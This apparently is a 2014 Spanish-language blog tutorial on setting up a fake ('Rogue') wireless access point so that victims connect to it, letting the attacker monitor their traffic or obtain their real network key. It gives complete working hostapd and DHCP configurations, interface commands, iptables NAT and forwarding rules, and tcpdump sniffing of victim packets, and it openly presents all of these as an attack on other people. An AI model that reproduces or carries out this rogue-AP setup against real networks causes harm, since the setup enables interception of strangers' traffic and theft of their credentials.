jueves, 20 de marzo de 2014

instalar AP falso

Improvisar un punto de acceso inalámbrico por el que lanzar nuestra conexión a otros equipos wi-fi, hasta para ser algo malvados... y utilizar nuestro recién creado punto de acceso con el objetivo de que su/sus víctima/s se conecten a él, para monitorear su trafico, o conseguir la clave de su verdadero ap (Cafe Latte Attack).
Para esto podemos configurar de tres maneras el AP, la más común es como un AP abierto, configurando el AP de modo que responda a cualquier nombre de ESSID. O configurando el AP como el Ap que normalmente utiliza la víctima.

Luego entraremos en la manera de hacer que el cliente se conecte a el, por el momento vamos a crearlo.

Lo que vamos a necesitar es bien poco , nuestra tarjeta wi-fi (con los drivers de inyección), hostapd y un servidor DHCP.

El proceso es muy similar a montar nuestro HOTSPOT con airbase, casi no difiere en  nada. Podríamos dividir ambos procesos  en tres partes: levantar y configurar nuestra tarjeta wifi en modo monitor, configurar el dhcp que dará ip a los "clientes" y compartir Internet con los "clientes".

Instalando lo necesario

Comenzaremos por instalar hostapd y el servidor dhcp. Podemos instalar hostapd desde los repositorios o bien bajarlo y compilarlo desde su pagina web.

apt-get install hostapd
apt-get install isc-dhcp-server


Una vez bajado hostapd deberemos configurarlo. Para ello crearemos un fichero "hostapd.conf" con el siguiente contenido (luego veremos otro tipo de configuraciones):

#configuración Hostapd
interface=wlan0
driver=nl80211
ssid=Rogue
channel=1


En esta configuración mínima estamos diciéndole que nuestra interfaz es wlan0, su driver, el nombre del punto de acceso "Rogue" y que emita por el canal uno.

Por ahora sencillo ¿no?

Configurando el DHCP server

Es una parte muy importante antes de levantar el servicio DHCP tener claro qué tarjeta va a ser la encargada de repartir las IP en nuestra máquina, y la subnet en que va a estar. En nuestro caso le daremos la ip 10.0.0.1 con la máscara de red 255.255.255.0 y así lo declararemos en el fichero de configuración de nuestro dhcp.

Para decirle al dhcp que tarjeta va a ser la encargada de repartir las ip deberemos editar el fichero /etc/default/isc-dhcp-server (este paso sera diferente según que distribución utilices y que versión de servidor dhcp) por ejemplo:

Fedora / RedHat / CentOS: 
# File: /etc/sysconfig/dhcpd
DHCPDARGS=wlan0

Debian squezze / Ubuntu: 
# File: /etc/default/dhcp3-server
INTERFACES="eth0"

Debian jessie
#file: /etc/default/isc-dhcp-server

El fichero de configuracion de dhcp /etc/dhcpd/dhcpd.conf quedaría tal que así:

ddns-update-style none;
ignore client-updates;
authoritative;
option local-wpad code 252 = text;

subnet
10.0.0.0 netmask 255.255.255.0 {
# --- default gateway
option routers 10.0.0.1;
# --- Netmask
option subnet-mask 255.255.255.0;
# --- Broadcast Address
option broadcast-address
10.0.0.255;
# --- Domain name servers, tells the clients which DNS servers to use.
option domain-name-servers 10.0.0.1, 8.8.8.8, 8.8.4.4;
option time-offset 0;
range 10.0.0.3 10.0.0.13;
default-lease-time 1209600;
max-lease-time 1814400;
}


Bueno ya tenemos configurada la mayor parte ahora vamos con la interface. En primer lugar pararemos "networ manager" para que no nos de la lata:

/etc/init.d/network-manager stop

Luego bajaremos la wlan0 para cambiarle la ip:

ifconfig wlan0 down
ifconfig wlan0 10.0.0.1 netmask 255.255.255.0
ifconfig wlan0 up

después levantaremos el servicio dhcp:

/etc/init.d/isc-dhcp-server restart

y levantaremos nuestro falso AP:

hostapd hostapd.conf

Hasta aquí sencillo tan solo nos falta compartir nuestra conexión para que los clientes tengan alcance la inet...

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -A FORWARD -i wlan0 -j ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

Y con esto y bizcocho!! 

Lo que podemos hacer también es un pequeño script para que a la hora de levantar nuestro AP sea todo mas rápido:





Llevando el cliente hacia nuestro Rogue AP

Una vez tenemos nuestro Rogue AP podemos utilizar varias técnicas para engañar al cliente dependiendo de cual es nuestro objetivo, para que al fin y al cabo todo acabe como muestra la imagen de la izquierda.

Una vez conectado el cliente a nuestro pícaro punto de acceso somos dueños y señores de sus paquetes y podemos hacer de el lo que nos plazca...

Para ver su tráfico por ejemplo solo tendríamos que arrancar nuestro sniffer preferido:

tcpdump por ejemplo:
tcpdump -i wlan0